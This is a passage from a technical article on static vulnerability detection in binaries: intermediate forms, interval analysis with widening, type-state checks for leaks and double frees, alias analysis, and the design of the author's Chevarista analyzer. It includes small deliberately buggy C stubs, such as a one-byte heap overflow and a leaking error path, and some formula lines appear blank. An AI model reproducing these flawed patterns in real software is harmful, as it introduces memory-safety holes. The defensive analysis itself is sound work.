		(<i4:Loop>, <i9:End>)            (i2)
		(		    ) = Sigma(P1,(  ));
		(<a4:Loop>, <a9:End>)            (a2)

		(a3)      (<BLoop:a1>, <BEnd:a5>)
		(  ) = Phi(                     );
		(i3)      (<BLoop:i1>, <BEnd:i5>)

		a5 = a4 - 1;
		i5 = i4 + 1;

		P2 = [i5 < a5]

		(<a4:Loop>, <a9:End>)             (a6)
		(                   ) = Sigma(P2, (  ));
		(<i4:Loop>, <i9:End>)             (i6)


		(a8)      (<BLoop:a1>, <Bend:a5>)
		(  ) = Phi(                     );
		(i8)      (<BLoop:i1>, <Bend:i5>)

		a10 = a9 + i9;

How can we add information to this intermediate form ? Now the Phi()
and Sigma() functions allows us to reason about forward dataflow
(in the normal execution order, using Sigma) and backward dataflow 
analysis (in the reverse order, using Phi). We can easily find the
inductive variables (variables that depends on themselves, like the
index or incrementing pointers in a loop), just using a simple analysis:

Lets consider the Sigma() before each Label, and try to iterate its 

		(<a4:Loop>, <a9:End>)             (a6)
		(                   ) = Sigma(P2, (  ));
		(<i4:Loop>, <i9:End>)             (i6)

	->	(<a5:Loop>,<a10:End>)
		(                   )
		(<i5:Loop>,   _|_   )

	->      (<a6:Loop>,   _|_   )
		(                   )
		(<i6:Loop>,   _|_   )

We take _|_ ("bottom") as a notation to say that a variable
does not have any more successors after a certain iteration
of the Sigma() function.

After some iterations (in that example, 2), we notice that 
the left-hand side and the right-hand side are identical 
for variables a and i. Indeed, both side are written given
a6 and i6. In the mathematical jargon, that is what is called
a fixpoint (of a function F) : 

	F(X) = X

or in this precise example:

	a6 = Sigma(a6)

By doing that simple iteration-based analysis over our 
symbolic functions, we are capable to deduce in an automated
way which variables are inductives in loops. In our example,
both a and i are inductive. This is very useful as you can imagine, 
since those variables become of special interest for us, especially 
when looking for  buffer overflows that might happen on buffers in 
looping code.

We will now somewhat specialize this analysis in the following
part of this article, by showing how this representation can
apply to

-------------------[ III. Analysis

	The previous part of the article introduced various notions
in program analysis. We might not use all the formalism in the future
of this article, and focuss on concrete examples. However, keep in
mind that we reason from now for analysis on the intermediate form
programs. This intermediate form is suitable for both source code
and binary code, but we will keep on staying at binary level for our
examples, proposing the translation to C only for understanding
purposes. Until now, we have shown our to understand data-flow analysis
and finding inductive variables from the (source or binary) code of 
the program. 

So what are the steps to find vulnerabilities now ?

A first intuition is that there is no generic definition for a 
vulnerability. But if we can describes them as behavior that 
violates a certain precise property, we are able to state if a 
program has a vulnerability or not. Generally, the property depends
on the class of bugs you want to analyse. For instance, properties 
that express buffer overflow safety or property that express a heap 
corruption (say, a double free) are different ones. In the first case, 
we talk about the indexation of a certain memory zone which has to never
go further the limit of the allocated memory. Additionally, for
having an overflow, this must be a write access. In case we have a
read access, we could refer this as an info-leak bug, which 
may be blindly or unblindly used by an attacker, depending if the
result of the memory read can be inspected from outside the process
or not. Sometimes a read-only out of bound access can also be used
to access a part of the code that is not supposed to be executed
in such context (if the out-of-bound access is used in a predicate).
In all cases, its interesting anyway to get the information by our 
analyzer of this unsupposed behavior, because this might lead to a 
wrong behavior, and thus, a bug.

In this part of the article, we will look at different class of
bugs, and understand how we can caracterize them, by running very
simple and repetitive, easy to implement, algorithm. This algorithm
is simple only because we act on an intermediate form that already
indicates the meaningful dataflow and controlflow facts of the
program. Additionally, we will reason either forward or backward,
depending on what is the most adapted to the vulnerability.

We will start by an example of numerical interval analysis and show
how it can be useful to detect buffer overflows. We will then show
how the dataflow graph without any value information can be useful
for finding problems happening on the heap. We will enrich our 
presentation by describing a very classic problem in program analysis,
which is  the discovery of equivalence between pointers (do they point
always on the same variable ? sometimes only ? never ?), also known as
alias analysis. We will explain why this analysis is mandatory for any
serious analyzer that acts on real-world programs. Finally, we will
give some more hints about analyzing concurrency properties inside
multithread code, trying to caracterize what is a race condition.

------------[ A. Numerical intervals

	When looking for buffer overflows or integer overflows, the 
mattering information is about the values that can be taken by 
memory indexes or integer variables, which is a numerical value.

Obviously, it would not be serious to compute every single possible
value for all variables of the program, at each program path : this
would take too much time to compute and/or too much memory for the values
graph to get mapped entirely.

By using certain abstractions like intervals, we can represent the set
of all possible values of a program a certain point of the program. We
will illustrate this by an example right now. The example itself is
meaningless, but the interesting point is to understand the mecanized
way of deducing information using the dataflow information of the program

We need to start by a very introductionary example, which consists of

Stub 4					Interval analysis of stub 4
-------					---------------------------

int  a, b;	

b = 0;					b = [0 to 0]
if (rand())		 
 b--;					b = [-1 to -1]
 b++;					b = [1 to 1]

					After if/else:

					b = [-1 to 1]

a = 1000000 / b;			a = [1000000 / -1 to 1000000 / 1] 
					    [Reported Error: b can be 0]

In this example, a flow-insensitive analyzer will merge the interval of values
at each program control flow merge. This is a seducing approach as you need to
pass a single time on the whole program to compute all intervals. However, this
approach is untractable most of the time. Why ? In this simple example, the
flow-insensitive analyzer will report a bug of potential division by 0, whereas
it is untrue that b can reach the value 0 at the division program point. This
is because 0 is in the interval [-1 to 1] that this false positive is reported
by the analyzer. How can we avoid this kind of over-conservative analysis ?

We need to introduce some flow-sensitiveness to the analysis, and differentiate
the interval for different program path of the program. If we do a complete flow 
sensitive analysis of this example, we have:

Stub 4					Interval analysis of stub 4
-------					---------------------------

int  a, b;	

b = 0;					b = [0 to 0]
if (rand())		 
 b--;					b = [-1 to -1]
 b++;					b = [1 to 1]

					After if/else:

					b = [-1 to -1 OR 1 to 1]

a = 1000000 / b;			a = [1000000 / -1 to 1000000 / -1] or 
					    [1000000 /  1 to 1000000 /  1] 
					  = {-1000000 or 1000000}

Then the false positive disapears. We may take care of avoiding to be flow sensitive
from the beginning. Indeed, if the flow-insensitive analysis gives no bug, then no
bugs will be reported by the flow-sensitive analysis either (at least for this example).
Additionally, computing the whole flow sensitive sets of intervals at some program point
will grow exponentially in the number of data flow merging point (that is, Phi() function
of the SSA form). 

For this reason, the best approach seems to start with a completely flow insensitive, 
and refine the analysis on demand. If the program is transforted into SSI form, then 
it becomes pretty easy to know which source intervals we need to use to compute the 
destination variable interval of values. We will use the same kind of analysis for 
detecting buffer overflows, in that case the interval analysis will be used on the 
index variables that are used for accessing memory at a certain offset from a given 
base address.

Before doing this, we might want to do a remark on the choice of an interval abstraction
itself. This abstraction does not work well when bit swapping is involved into the 
operations. Indeed, the intervals will generally have meaningless values when bits are
moved inside the variable. If a cryptographic operation used bit shift that introduces 0 
for replacing shifted bits, that would not be a a problem, but swapping bits inside a given 
word is a problem, since the output interval is then meaningless.

        c = a | b		(with A, B, and C integers)
	c = a ^ b
	c = not(c)

Giving the interval of A and B, what can we deduce for the intervals of C ? Its less trivial
than a simple numerical change in the variable. Interval analysis is not very well adapted
for analyzing this kind of code, mostly found in cryptographic routines.

We will now analyze an example that involves a buffer overflow on the heap. Before
doing the interval analysis, we will do a first pass to inform us about the statement
related to memory allocation and disallocation. Knowing where memory is allocated
and disallocated is a pre-requirement for any further bound checking analysis.

Stub 5					Interval analysis with alloc annotations
------					----------------------------------------

char *buf;				buf = _|_ (uninitialized)
int   n = rand();			n   = [-Inf, +Inf]
buf = malloc(n)				buf = initialized of size [-Inf to Inf]
i   = 0;				i   = [0,0], [0,1] ... [0,N]

while (i <= n)				      
  assert(i < N)			    
  buf[i] = 0x00;			
  i++;					i   = [0,1], [0,2] ... [0,N]
					     (iter1  iter2 ... iterN)
return (i);

Lets first explain that the assert() is a logical representation in the intermediate
form, and is not an assert() like in C program. Again, we never do any dynamic analysis
but only static analysis without any execution. In the static analysis of the intermediate
form program, a some point the control flow will reach a node containing the assert statement.
In the intermediate (abstract) word, reaching an assert() means performing a check on the
abstract value of the predicate inside the assert (i < N). In other words, the analyzer
will check if the assert can be false using interval analysis of variables, and will print
a bug report if it can. We can also let the assert() implicits, but representing them
explicitely make the analysis more generic, modular, and adaptable to the user.

As you can see, there is a one-byte-overflow in this example. It is pretty trivial
to spot it manually, however we want to develop an automatic routine  for doing
it. If we deploy the analysis that we have done in the previous example, the assert()
that was automatically inserted by the analyzer after each memory access of the program 
will fail after N iterations. This is because arrays in the C language start with index 0 and 
finish with an index inferior of 1 to their allocated size. Whatever kind of 
code will be inserted between those lines (except, of course, bit swapping as 
previously mentioned), we will always be able to propagate the intervals and find
that memory access are done beyond the allocated limit, then finding a clear
memory leak or memory overwrite vulnerability in the program.

However, this specific example brings 2 more questions:

	- We do not know the actual value of N. Is it a problem ? If we 
	manage to see that the constraint over the index of buf is actually
	the same variable (or have the same value than) the size of the
	allocated buffer, then it is not a problem. We will develop this in 
	the alias analysis part of this article when this appears to be a

	- Whatever the value of N, and provided we managed to identify N
	all definitions and use of the variable N, the analyzer will require N
	iteration over the loop to detect the vulnerability. This is not
	acceptable, especially if N is very big, which in that case many
	minuts will be necessary for analysing this loop, when we actually
	want an answer in the next seconds.

The answer for this optimization problem is a technique called Widening, gathered
from the theory of abstract interpretation. Instead of executing the loop N
times until the loop condition is false, we will directly in 1 iteration go to
the last possible value in a certain interval, and this as soon as we detect a
monotonic increase of the interval. The previous example would then compute
like in:

Stub 5					Interval analysis with Widening
------					-------------------------------

char *buf;				buf = _|_ (uninitialized)
int   n = rand();			n   = [-Inf, +Inf]
buf = malloc(n)				buf = initialized of size [-Inf to Inf]
i   = 0;				i = [0,0]

while (i <= n)
  assert(i < N); 			    iter1  iter2 iter3 iter4  ASSERT!
  buf[i] = 0x00;			i = [0,0], [0,1] [0,2] [0,N] 	
  i++;					i = [0,1], [0,2] [0,3] [0,N] 
return (i);

Using this test, we can directly go to the biggest possible interval in only 
a few iterations, thus reducing drastically the requested time for finding
the vulnerability. However this optimization might introduce additional
difficulties when conditional statement is inside the loop:

Stub 6					Interval analysis with Widening
------					-------------------------------

char *buf;				buf = _|_ (uninitialized)
int   n = rand() + 2;			n   = [-Inf, +Inf]
buf = malloc(n)				buf = initialized of size [-Inf to Inf]
i   = 0;				i = [0,0]

while (i <= n)				i = [0,0] [0,1] [0,2] [0,N] [0,N+1]
  if (i < n - 2)		        i = <same than previously for all iterations>
    assert(i < N - 1)			[Never triggered !]
    buf[i] = 0x00;  			i = [0,0] [0,1] [0,2] [0,N] <False positive>    
  i++;					i = [0,1] [0,2] [0,3] [0,N] [0,N+1]	
return (i);

In this example, we cannot assume that the interval of i will be the same everywhere
in the loop (as we might be tempted to do as a first hint for handling intervals in
a loop). Indeed, in the middle of the loop stands a condition (with predicate being 
i < n - 2) which forbids the interval to grow in some part of the code. This is problematic 
especially if we decide to use widening until the loop breaking condition. We will miss
this more subtle repartition of values in the variables of the loop. The solution for this
is to use widening with thresholds. Instead of applying widening in a single time over the
entire loop, we will define a sequel of values which corresponds to "strategic points" of
the code, so that we can decide to increase precisely using a small-step values iteration.

The strategic points can be the list of values on which a condition is applied. In our case
we would apply widening until n = N - 2 and not until n = N. This way, we will not trigger
a false positive anymore because of an overapproximation of the intervals over the entire
loop. When each step is realized, that allows to annotate which program location is the subject
of the widening in the future (in our case: the loop code before and after the "if" statement).

Note that, when we reach a threshold during widening, we might need to apply a small-step
iteration more than once before widening again until the next threshold. For instance, 
when predicates such as (a != immed_value) are met, they will forbid the inner code of 
the condition to have their interval propagated. However, they will forbid this just one 
iteration (provided a is an inductive variable, so its state will change at next iteration) 
or multiple iterations (if a is not an inductive variable and will be modified only at another 
moment in the loop iterative abstract execution). In the first case, we need only 2 small-step
abstract iterations to find out that the interval continues to grow after a certain iteration.
In the second case, we will need multiple iteration until some condition inside the loop is
reached. We then simply needs to make sure that the threshold list includes the variable value
used at this predicate (which heads the code where the variable a will change). This way, we
can apply only 2 small-step iterations between those "bounded widening" steps, and avoid
generating false positives using a very optimized but precise abstract evaluation sequence.

In our example, we took only an easy example: the threshold list is only made of 2 elements (n
and (n - 2)). But what if a condition is realized using 2 variables and not a variable and 
an immediate value ? in that case we have 3 cases:

CASE1 - The 2 variables are inductive variables: in that case, the threshold list of the two variables 
must be fused, so widening do not step over a condition that would make it lose precision. This
seem to be a reasonable condition when one variable is the subject of a constraint that involve
a constant and the second variable is the subject of a constraint that involve the first variable:

Stub 7:						Threshold discovery
-------						-------------------

int i = 0;
int n = MAXSIZE;

while (i < n)					Found threshold n
  if (a < i < b)				Found predicate involving a and b
  if (a > sizeof(something))			Found threshold for a
    i = b;
  else if (b + 1 < sizeof(buffer))		Found threshold for b
    i = a;

In that case, we can define the threshold of this loop being a list of 2 values,
one being sizeof(something), the other one being sizeof(buffer) or sizeof(buffer) - 1
in case the analyzer is a bit more clever (and if the assembly code makes it clear
that the condition applyes on sizeof(buffer) - 1).

CASE2 - One of the variable is inductive and the other one is not. 

So we have 2 subcases:

 - The inductive variable is involved in a predicate that leads to modification
   of the non-inductive variable. It is not possible without the 2 variables 
   being inductives !Thus we fall into the case 1 again.

 - The non-inductive variable is involved in a predicate that leads to
   modification of the inductive variable. In that case, the non-inductive
   variable would be invariant over the loop, which mean that a test between 
   its domain of values (its interval) and the domain of the inductive
   variable is required as a condition to enter the code stubs headed by the
   analyzed predicate. Again, we have 2 sub-subcases:

	* Either the predicate is a test == or !=. In that case, we must compute
	the intesection of both variables intervals. If  the intersection is void,
	the test will never true, so its dead code. If the intersection is itself
	an interval (which will be the case most of the time), it means that the
	test will be true over this inductive variable intervals of value, and 
	false over the remaining domain of values. In that case, we need to put
	the bounds of the non-inductive variable interval into the threshold list for 
	the widening of inductive variables that depends on this non-inductive 

	* Or the predicate is a comparison : a < b (where a or b is an inductive
	variable). Same remarks holds : we compute the intersection interval 
	between a and b. If it is void, the test will always be true or false and
	we know this before entering the loop. If the interval is not void, we 
	need to put the bounds of the intersection interval in the widening threshold
	of the inductive variable.

CASE3 - None of the variables are inductive variables

In that case, the predicate that they define has a single value over the
entire loop, and can be computed before the loop takes place. We then can
turn the conditional code into an unconditional one and apply widening
like if the condition was not existing. Or if the condition is always
false, we would simply remove this code from the loop as the content of
the conditional statement will never be reached.

As you can see, we need to be very careful in how we perform the widening. If
the widening is done without thresholds, the abstract numerical values will
be overapproximative, and our analysis will generate a lot of false positives.
By introducing thresholds, we sacrify very few performance and gain a lot of 
precision over the looping code analysis. Widening is a convergence accelerator
for detecting problems like buffer overflow. Some overflow problem can happen
after millions of loop iteration and widening brings a nice solution for
getting immediate answers even on those constructs.

I have not detailed how to find the size of buffers in this paragraph. Wether
the buffers are stack or heap allocated, they need to have a fixed size at 
some point and the stack pointer must be substracted somewhere (or malloc
needs to be called, etc) which gives us the information of allocation 
alltogether with its size, from which we can apply our analysis. 

We will now switch to the last big part of this article, by explaining how
to check for another class of vulnerability.

------------[ B. Type state checking (aka double free, memory leaks, etc)

There are some other types of vulnerabilities that are slightly different to
check. In the previous part we explained how to reason about intervals of 
values to find buffer overflows in program. We presented an optimization
technique called Widening and we have studied how to weaken it for gaining
precision, by generating a threshold list from a set of predicates. Note that
we havent explicitely used what is called the "predicate abstraction", which
may lead to improving the efficiency of the analysis again. The interested
reader will for sure find resources about predicate abstraction on any good
research oriented search engine. Again, this article is not intended to give
all solutions of the problem of the world, but introduce the novice hacker
to the concrete problematic of program analysis.

In this part of the article, we will study how to detect memory leaks and
heap corruptions. The basic technique to find them is not linked with interval
analysis, but interval analysis can be used to make type state checking more
accurate (reducing the number of false positives). 

Lets take an example of memory leak to be concrete:

Stub 8:

1. u_int off  = 0;
2. u_int ret  = MAXBUF;
3. char  *buf = malloc(ret);

4. do {
5.     off += read(sock, buf + off, ret - off);
6.     if (off == 0)
7.       return (-ERR);
8.     else if (ret == off)
9.       buf = realloc(buf, ret * 2);
10.} while (ret);

11. printf("Received %s \n", buf);
12. free(buf);
13. return;

In that case, there is no overflow but if some condition appears after the read, an error
is returned without freeing the buffer. This is not a vulnerability as it, but it can
help a lot for managing the memory layout of the heap while trying to exploit a heap
overflow vulnerability. Thus, we are also interested in detecting memory leak that
turns some particular exploits into powerful weapons.

Using the graphical representation of control flow and data flow, we can easily
find out that the code is wrong:

Graph analysis of Stub 8

	o A				A: Allocation
        |     \  
        o      \
       / \      \
      /   \      \			R: Return
   R o     o REA /			REA: Realloc
      \   /     /
       \ /     /
        o     /
        |    /
        |   /
        |  /
        | /
        |				F: Free
      F o
      R o				R: Return

Note that this representation is not a data flow graph but a
control-flow graph annotated with data allocation information for
the BUF variable. This allows us to reason about existing control 
paths and sequence of memory related events. Another way of doing 
this would have been to reason about data dependences together with
the predicates, as done in the first part of this article with the 
Labelled SSI form. We are not dogmatic towards one or another 
intermediate form, and the reader is invited to ponder by himself 
which representation fits better to his understanding. I invite
you to think twice about the SSI form which is really a condensed
view of lots of different information. For pedagogical purpose, we
switch here to a more intuitive intermediate form that express a 
similar class of problems.

Stub 8:

0. #define PACKET_HEADER_SIZE 20

1. int   off  = 0;
2. u_int ret  = 10;
3. char  *buf = malloc(ret);				M

4. do {
5.     off += read(sock, buf + off, ret - off);
6.     if (off <= 0)
7.       return (-ERR);					R
8.     else if (ret == off)
9.       buf = realloc(buf, (ret = ret * 2));		REA
10.} while (off != PACKET_HEADER_SIZE);

11. printf("Received %s \n", buf);
12. free(buf);						F
13. return;						R

Using simple DFS (Depth-First Search) over the graph representing Stub 8, 
we are capable of extracting sequences like:

1,2,(3 M),4,5,6,8,10,11,(12 F),(12 R)		M...F...R	-noleak-

1,2,(3 M),4,(5,6,8,10)*,11,(12 F),(12 R)	M(...)*F...R	-noleak-

1,2,(3 M),4,5,6,8,10,5,6,(7 R)			M...R		-leak-

1,2,(3 M),(4,5,6,8,10)*,5,6,(7 R)		M(...)*R	-leak-

1,2,(3 M),4,5,6,8,(9 REA),10,5,6,(7 R)		M...REA...R	-leak-

1,2,(3 M),4,5,6,(7 R)				M...R		-leak-


More generally, we can represent the set of all possible traces for
this example :

		1,2,3,(5,6,(7 | 8(9 | Nop)) 10)*,(11,12,13)*

with | meaning choice and * meaning potential looping over the events
placed between (). As the program might loop more than once or twice,
a lot of different traces are potentially vulnerable to the memory leak
(not only the few we have given), but all can be expressed using this
global generic regular expression over events of the loop, with respect
to this regular expression:


that represent traces containing a malloc followed by a return without 
an intermediate free, which corresponds in our program to:


		  =	.*(3).*(7)	 # because 12 is not between 3 and 7 in any cycle

In other words, if we can extract a trace that leads to a return after passing
by an allocation not followed by a free (with an undetermined number of states
between those 2 steps), we found a memory leak bug.

We can then compute the intersection of the global regular expression trace
and the vulnerable traces regular expression to extract all potential 
vulnerable path from a language of traces. In practice, we will not generate
all vulnerable traces but simply emit a few of them, until we find one that
we can indeed trigger. 

Clearly, the first two trace have a void intersection (they dont contain 7). So
those traces are not vulnerable. However, the next traces expressions match
the pattern, thus are potential vulnerable paths for this vulnerability.

We could use the exact same system for detecting double free, except that
our trace pattern would be :


that is : a free followed by a second free on the same dataflow, not passing
through an allocation between those. A simple trace-based analyzer can detect
many cases of vulnerabilities using a single engine ! That superclass of 
vulnerability is made of so called type-state vulnerabilities, following the idea that
if the type of a variable does not change during the program, its state does,
thus the standard type checking approach is not sufficient to detect this kind of 

As the careful reader might have noticed, this algorithm does not take predicates
in account, which means that if such a vulnerable trace is emitted, we have no 
garantee if the real conditions of the program will ever execute it. Indeed, we 
might extract a path of the program that "cross" on multiple predicates, some
being incompatible with others, thus generating infeasible paths using our

For example in our Stub 8 translated to assembly code, a predicate-insensitive 
analysis might generate the trace:


which is impossible to execute because predicates holding at states 8 and 10 
cannot be respectively true and false after just one iteration of the loop. Thus 
such a trace cannot exist in the real world. 

We will not go further this topic for this article, but in the next part, we will
discuss various improvements of what should be a good analysis engine to avoid
generating too much false positives.

------------[ C. How to improve

	In this part, we will review various methods quickly to determine how exactly
it is possible to make the analysis more accurate and efficient. Current researchers
in program analysis used to call this a "counter-example guided" verification. Various
techniques taken from the world of Model Checking or Abstract Interpretation can then
be used, but we will not enter such theoretical concerns. Simply, we will discuss the
ideas of those techniques without entering details. The proposed chevarista analyzer
in appendix of this article only perform basic alias analysis, no predicate analysis,
and no thread scheduling analysis (as would be useful for detecting race conditions).
I will give the name of few analyzer that implement this analysis and quote which
techniques they are using.

----------------------[ a. Predicate analysis and the predicate lattice

Predicate abstraction [PA] is about collecting all the predicates in a program, and
constructing a mathematic object from this list called a lattice [LAT]. A lattice is
a set of objects on which a certain (partial) order is defined between elements
of this set. A lattice has various theoretical properties that makes it different
than a partial order, but we will not give such details in this article. We will
discuss about the order itself and the types of objects we are talking about:

	- The order can be defined as the union of objects 

				(P < Q iif P is included in Q)

	- The objects can be predicates

	- The conjunction (AND) of predicate can be the least upper bound of N
	predicates. Predicates (a > 42) and (b < 2) have as upper bound:

				(a > 42) && (b < 2)

	- The disjunction (OR) of predicates can be the greatest lower bound of
	N predicates. Predicates (a > 42) and (b < 2) would have as lower

				(a > 42) || (b < 2)

	So the lattice would look like:

				(a > 42) && (b < 2)
					/  \
				       /    \
				      /      \
				(a > 42)     (b < 2)
				      \      /
                                       \    /
                                        \  /
	                        (a > 42) || (b < 2)

Now imagine we have a program that have N predicates. If all predicates
can be true at the same time, the number of combinations between predicates
will be 2 at the power of N. THis is without counting the lattice elements
which are disjunctions between predicates. The total number of combinations 
will then be then 2*2pow(N) - N : We have to substract N because the predicates
made of a single atomic predicates are shared between the set of conjunctives
and the set of disjunctive predicates, which both have 2pow(N) number of 
elements including the atomic predicates, which is the base case for a conjunction
(pred && true) or a disjunction (pred || false). 

We may also need to consider the other values of predicates : false, and unknown.
False would simply be the negation of a predicate, and unknown would inform about
the unknown truth value for a predicate (either false or true, but we dont know).
In that case, the number of possible combinations between predicates is to count
on the number of possible combinations of N predicates, each of them being potentially
true, false, or unknown. That makes up to 3pow(N) possibilities. This approach is called
three-valued logic [TVLA].

In other words, we have a exponential worse case space complexity for constructing 
the lattice of predicates that correspond to an analyzed program. Very often, the 
lattice will be smaller, as many predicates cannot be true at the same time. However, 
there is a big limitation in such a lattice: it is not capable to analyze predicates 
that mix AND and OR. It means that if we analyze a program that can be reached using 
many different set of predicates (say, by executing many different possible paths, 
which is the case for reusable functions), this lattice will not be capable to give 
the most precise "full" abstract representation for it, as it may introduce some 
flow-insensitivity in the analysis (e.g. a single predicate combinations will represent 
multiple different paths). As this might generate false positives, it looks like a good 
trade-off between precision and complexity. Of course, this lattice is just provided as 
an example and the reader should feel free to adapt it to its precise needs and depending 
on the size of the code to be verified. It is a good hint for a given abstraction
but we will see that other information than predicates are important for program

---------------------[ b. Alias analysis is hard

	A problem that arises in both source code but even more in binary code
automated auditing is the alias analysis between pointers. When do pointers
points on the same variables ? This is important in order to propagate the
infered allocation size (when talking about a buffer), and to share a 
type-state (such as when a pointer is freed or allocated : you could miss 
double free or double-something bugs if you dont know that 2 variables are 
actually the same).

There are multiple techniques to achieve alias analysis. Some of them works
inside a single function (so-called intraprocedural [DDA]). Other works across
the boundaries of a function. Generally, the more precise is your alias
analysis, the smaller program you will be capable to analyze. It seems
quite difficult to scale to millions of lines of code if tracking every
single location for all possible pointers in a naive way. In addition
to the problem that each variable might have a very big amount of aliases
(especially when involving aliases over arrays), a program translated to
a single-assignment or single-information form has a very big amount of
variables too. However the live range of those variables is very limited,
so their number of aliases too. It is necessary to define aliasing relations
between variables so that we can proceed our analysis using some extra checks:

	- no_alias(a,b)   : Pointers a and b definitely points on different sets
			   of variables

	- must_alias(a,b) : Pointers a and b definitely points on the same set
			   of variables

	- may_alias(a,b)  : The "point-to" sets for variables a and b share some
			    elements (non-null intersection) but are not equal.

NoAliasing and MustAliasing are quite intuitive. The big job is definitely
the MayAliasing. For instance, 2 pointers might point on the same variable
when executing some program path, but on different variables when executing
from another path. An analysis that is capable to make those differences is
called a path-sensitive analysis. Also, for a single program location manipulating
a given variable, the point-to set of the variable can be different depending
on the context (for example : the set of predicates that are true at this moment 
of abstract program interpretation). An analysis that can reason on those
differences is called context-sensitive.

Its an open problem in research to find better alias analysis algorithms that scale
to big programs (e.g. few computation cost) and that are capable to keep
sufficiently precision to prove security properties. Generally, you can have one,
but not the other. Some analysis are very precise but only works in the boundaries
of a function. Others work in a pure flow-insensitive manner, thus scale to big
programs but are very imprecise. My example analyzer Chevarista implements only
a simple alias analysis, that is very precise but does not scale well to big
programs. For each pointer, it will try to compute its point-to set in the concrete
world by somewhat simulating the computation of pointer arithmetics and looking at 
its results from within the analyzer. It is just provided as an example but is
in no way a definitive answer to this problem.

--------------------[ c. Hints on detecting race conditions

	Another class of vulnerability that we are interested to detect
automatically are race conditions. Those vulnerability requires a different
analysis to be discovered, as they relates to a scheduling property : is
it possible that 2 thread get interleaved (a,b,a,b) executions over their
critical sections where they share some variables ? If the variables are
all well locked, interleaved execution wont be a problem anyway. But if 
locking is badly handled (as it can happens in very big programs such
as Operating Systems), then a scheduling analysis might uncover the 

Which data structure can we use to perform such analysis ? The approach
of JavaPathFinder [JPF] that is developed at NASA is to use a scheduling graph.
The scheduling graph is a non-cyclic (without loop) graph, where nodes
represents states of the program and and edges represents scheduling
events that preempt the execution of one thread for executing another.

As this approach seems interesting to detect any potential scheduling
path (using again a Depth First Search over the scheduling graph) that
fails to lock properly a variable that is used in multiple different
threads, it seems to be more delicate to apply it when we deal with
more than 2 threads. Each potential node will have as much edges as
there are threads, thus the scheduling graph will grow exponentially
at each scheduling step. We could use a technique called partial
order reduction to represent by a single node a big piece of code
for which all instructions share the same scheduling property (like:
it cannot be interrupted) or a same dataflow property (like: it uses
the same set of variables) thus reducing the scheduling graph to make
it more abstract.

Again, the chevarista analyzer does not deal with race conditions, but
other analyzers do and techniques exist to make it possible. Consider
reading the references for more about this topic.

-----------[ IV. Chevarista: an analyzer of binary programs

   Chevarista is a project for analyzing binary code. In this article, most of
   the examples have been given in C or assembly, but Chevarista only analyze
   the binary code without any information from the source. Everything it
   needs is an entry point to start the analysis, which you can always get
   without troubles, for any (working ? ;) binary format like ELF, PE, etc.

   Chevarista is a simplier analyzer than everything that was presented in
   this article, however it aims at following this model, driven by the succesful
   results that were obtained using the current tool. In particular, the
   intermediate form of Chevarista at the moment is a graph that contains
   both data-flow and control-flow information, but with sigma and phi 
   functions let implicit.

   For simplicity, we have chosen to work on SPARC [SRM] binary code, but after
   reading that article, you might understand that the representations
   used are sufficiently abstract to be used on any architecture. One could
   argue that SPARC instruction set is RISC, and supporting CISC architecture 
   like INTEL or ARM where most of the instruction are conditional, would be
   a problem. You are right to object on this because  these architectures
   requires specific features of the architecture-dependant backend of
   the decompiler-analyzer. Currently, only the SPARc backend is coded and there 
   is an empty skeleton for the INTEL architecture [IRM].

   What are, in the detail, the difference between such architectures ?

   They are essentially grouped into a single architecture-dependant component :
				The Backend

   On INTEL 32bits processors, each instruction can perform multiple operations. 
   It is also the case for SPARC, but only when conditional flags are affected 
   by the result of the operation executed by the instruction. For instance,
   a push instruction write in memory, modify the stack pointer, and potentially
   modify the status flags (eflags register on INTEL), which make it very hard to
   analyze. Many instructions do more than a single operation, thus we need to
   translate into intermediate forms that make those operations more explicit. If
   we limit the number of syntactic constructs in that intermediate form, we are
   capable of performing architecture independant analysis much easier with
   all operations made explicit. The low-level intermediate form of Chevarista
   has around 10 "abstract operations" in its IR : Branch, Call, Ternop (that
   has an additional field in the structure indicating which arithmetic or 
   logic operation is performed), Cmp, Ret, Test, Interrupt, and Stop. Additionally
   you have purely abstract operations (FMI: Flag Modifying Instruction), CFI
   (Control Flow Instruction), and Invoke (external functions calls) which allow to 
   make the analysis further even more generic. Invoke is a kind of statement that
   inform the analyzer that it should not try to analyze inside the function being
   invoked, but consider those internals as an abstraction. For instance, types
   Alloc, Free, Close are child classes of the Invoke abstract class, which model
   the fact that malloc(), free(), or close() are called and the analyzer should
   not try to handle the called code, but consider it as a blackbox. Indeed, finding
   allocation bugs does not require to go analyzing inside malloc() or free(). This
   would be necessary for automated exploit generation tho, but we do not cover this

   We make use the Visitor Design Pattern for architecturing the analysis, as presented 
   in the following paragraph.

--------------------[ B. Program transformation & modeling

	The project is organized using the Visitor Design Pattern [DP]. To sum-up,
  the Visitor Design Pattern allows to walk on a graph (that is: the intermediate
  form representation inside the analyzer) and transform the nodes (that contains
  either basic blocs for control flow analysis, or operands for dataflow analysis:
  indeed the control or data flow links in the graph represents the ancestors /
  successors relations between (control flow) blocs or (data flow) variables.

  The project is furnished as it:

  visitor: The default visitor. When the graph contains node which
  type are not handled by the current visitor, its this visitor that
  perform the operation. THe default visitor is the root class of 
  the Visitor classes hierarchy.

  arch	      : the architecture backend. Currently SPARC32/64 is fully
	      provided and the INTEL backend is just a skeleton. The
	      whole proof of concept was written on SPARC for simplicity. This
	      part also includes the generic code for dataflow and control flow 

  graph	      : It contains all the API for constructing graphs directly into
	      into the intermediate language. It also defines all the abstract
	      instructions (and the "more" abstract instruction as presented

  gate	      : This is the interprocedural analysis visitor. Dataflow and
	      Control flow links are propagated interprocedurally in that visitor. 
	      Additionally, a new type "Continuation" abstracts different kind of 
	      control transfer (Branch, Call, Ret, etc) which make the analysis even
	      easier to perform after this transformation.

  alias	      : Perform a basic point-to analysis to determine obvious aliases 
	      between variables before checking for vulnerabilities. THis analysis is 
	      exact and thus does not scale to big programs. There are many hours of
	      good reading and hacking to improve this visitor that would make the whole
	      analyzer much more interesting in practice on big programs.

  heap	      : This visitor does not perform a real transformation, but simplistic graph 
	      walking to detect anomalies on the data flow graph. Double frees, Memory
	      leaks, and such, are implemented in that Visitor.

  print	      : The Print Visitor, simply prints the intermediate forms after each
	      transformation in a text file.

  printdot    : Print in a visual manner (dot/graphviz) the internal representation. This
	      can also be called after each transformation but we currently calls it 
	      just at this end of the analysis.

Additionally, another transformation have been started but is still work in progress:

 symbolic     : Perform translation towards a more symbolic intermediate forms (such as
	      SSA and SSI) and  (fails to) structure the control flow graphs into a graph 
	      of zones. This visitor is work in progress but it is made part of this 
	      release as Chevarista will be discontinued in its current work, for being
	      implemented in the ERESI [RSI] language instead of C++.

	      ---------------      -----------      -----------      ----------   
	     |               |    |           |    |           |    |          |
